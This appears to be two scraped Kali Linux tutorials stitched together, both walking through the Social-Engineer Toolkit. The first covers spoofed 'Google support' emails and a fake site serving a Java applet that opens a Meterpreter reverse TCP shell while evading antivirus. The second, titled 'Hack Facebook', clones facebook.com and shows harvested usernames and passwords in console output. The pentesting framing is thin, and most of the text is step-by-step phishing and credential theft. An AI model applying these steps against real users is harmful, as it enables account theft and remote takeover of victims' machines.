Social engineer toolkit kali linux

SET — The Social Engineering Toolkit

Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks, or even months trying to penetrate layers of network security when we can just trick a user into running a file that allows us full access to their machine and bypass antivirus, firewalls, and many intrusion detection systems?

This is most commonly used in phishing attacks today, craft an e-mail or create a fake website that tricks user into running , malicious file that creates a backdoor into their system. But as a security expert, how could we test this against our network ? Would such attack work, and how could we defend against it ?

Kali Linux includes one of the popular social engineering attack toolkit available, Devid kennedy’s Social Engineering Toolkit (SET). Devid’s team is very active on SET, there are always new features and attacks being added, More recently several non-social engineering tools have been also added to SET making it a very robust attack tool.

In this post we will take a look at some of the tools included with SET and two of the attacks options, both powershell based attacks.

We can start SET from the Kali Linux main menu :

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Generator
5. Mass Mailer Attack
6. Arduino-Based Attack Vector
7. Wireless Access Point Attack Vector
8. QRCode Generator Attack Vector
9. Powershell Attack Vectors
10. SMS Spoofing Attack Vector
11. Third Party Modules

Here in this tutorial we choose options 5. That is Mass Mailer Attack.

Mass Mailer

One way a Social Engineer will attack a network is to send out a flood of e-,ails to company address and see who will respond or run the malicious attachment we sent with it.

After entering in option 5 in SET we got two options

1. E-mail Attack single E-mail Address
2. E-mail Attack Mass Mailer

The screenshot is following:

For this example let’s just send one. We press 1 and hit «Enter».

Then we enter a target e-mail address. See the following screenshot :

For this example, let’s just send one. We press 1 and hit «Enter«.

Now we select option 1 to use a Gmail account or another server. For this tutorial we will use a fake Gmail account. The Gmail address and password must be correct.

Then we choose a spoofed name to use for the ‘from’ line of the message. Let’s use «supporrt@google.com» so it look that it’s from Google. Pay special attention to this field, as this where the real social engineering takes place.

Now SET asks for the password of the Gmail account.

Then we press yes at the prompt «Flag this message/s as high priority ?»

We don’t want to attach any malicious file so we choose «no» when prompt «Do you want to attach a file ?»

Next enter an e-mail subject line. What about «Important update»

Enter «p» when prompted to «Send the message as html or plain ?»

Now type-in a fake message, preferably one that will entice our victim to click on a malicious link included or entice them surf to a malicious web page. In actual defense practice this could just be a test webpage that records the IP address of those who were tricked to surf to the page. That way as a security expert we know who in our organization needs to be better educated on the risks of malicious e-mails.

When finished we type «END» in the last line. Just like following screenshot.

Then press «Enter» and SET will send out the e-mail to victim.

The message in above screenshot is obviously a silly fake, but something like this (With a much more believable message ) could be used to test employee’s ability to detect, resist and report phishing attempts.

Java PYInjector Attack

So far we have just sent a fake e-mail that could redirect someone to a bogus site. But if we could make a fake site that offered up a booby script, and if the user allows the script to create shell with the user.

The Java PyInjector attack leverages the anti-virus bypassing capabilities of PowerShell based attacks with a Java application. We will use SET to create a fictitious website that will offer up a booby-trapped Java app, and if user allows the app to run, we get a full remote session to the system.

We will be using a Windows 8 system as the target in the example.

From the SET menu we choose number 1 for Social-Engineering Attacks. Then we choose 2 for Website Attack Vectors. Now we choose number 1 for Java Applet Attack method.
This will create a Java app that has a backdoor shell.

The Metasploit Browser Exploit attacks the client system with Metasploit browser exploits. The Credentials Harvester Attack is pretty slick as it clones an existing website (like Facebook) and then stores any credentials that are entered into it.

TabNabbing works great if the client has a lot of browser window open, it waits a certain time then switches one of the tabs to a page that SET creates. The Web-Jacking attacks uses iFrame replacements to make a malicious link look legit, and finally the Multi-Attack combines several of the above attacks.

Next choose 1 for Web-Templates to have SET create a generic webpage to use, or use option 2 » Site Cloner » to allow SET to use an existing website as a template for the attack webpage.

Choose yes/no in NAT/port forwarding. Usually selecting no will be sufficient if using an internal testing lab.

Enter the IP address of our SET machine. We can open another terminal window and type following command for the IP address:

The IP address is in the following screenshot:

Now select a template choose 1 «Java Reuqired«.
Then we pick a payload we want delivered, we usually choose 14 «ShellCodeExes Alphanum Shellcode» (This is an interesting as it runs from memory, never touching the hard drive, this effectively by-passing some anti-virus programs ) or 15 «PYInjector Shellcode«. For now let’s go ahead and use option 15, «PYInjector Shellcode Injection«default port 443.

Next choose a payload to inject. let’s pick the first option «Windows Meterpreter Reverse TCP«.

Now SET is all ready to go and does several things. It creates and encrypts the Powershell injection code, creates website, loads metasploit and starts a service looking for people to connect. When done our screen will look like following screenshot:

Now we need to trick victim that he clicks on our malicious link. Here we have hosted the site in our local host so the link will be the IP address of our Kali Linux system and victim should be in our same network. Victim’s browser want’s to run our malicious Java applet in popup. If he click on «Run», our meterpreter session will started and we can do anything on victim’s PC.

To do this on WAN (on Internet, not only in local network) Read this tutorial Easy Port Forwarding using SSH .

The Social Engineering Toolkit is truly a robust and feature rich tool for any corporate security testing team.
Spend some time with SET and check out numerous options it offers for attacking a target system. You can use SET to create malicious CD/DVD and USB media (for creating malicious media and leaving them in corporate parking lots, etc), a slew of arduino based attacks, Microsoft SQL Brute Forcer, Wireless Access Point attack, a Mass Mailer, QR code Attack and a bunch of website social engineering attacks that we did not cover yet. Comment below which tutorial should comes next.

Источник

Social Engineering Toolkit — Kali : Credential Harvestor : Hack Facebook

Hacking Facebook

Social Engineering Toolkit

Humans are the weakest link in any security system

Shashwat (That’ll be me)

If you have read the previous post, then you know what I’m talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

Kali Linux

Se-toolkit

# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update.
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[—] The Social-Engineer Toolkit (SET) [—]
[—] Created by: David Kennedy (ReL1K) [—]
[—] Version: 4.3.9 [—]
[—] Codename: ‘Turbulence’ [—]
[—] Follow us on Twitter: @trustedsec [—]
[—] Follow me on Twitter: @dave_rel1k [—]
[—] Homepage: https://www.trustedsec.com [—]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>

Explanation

• 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
• The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
• Then, the 3 selects Credential Harvestor. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you’ll be seeing something like this-

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Find your IP

Back to se-toolkit

Now it’ll ask you to specify the IP to which the data is supposed to be sent to. That’ll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it’ll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

On the Kali Linux Machine itself

POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password

On Windows 8 machine (host)

POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Источник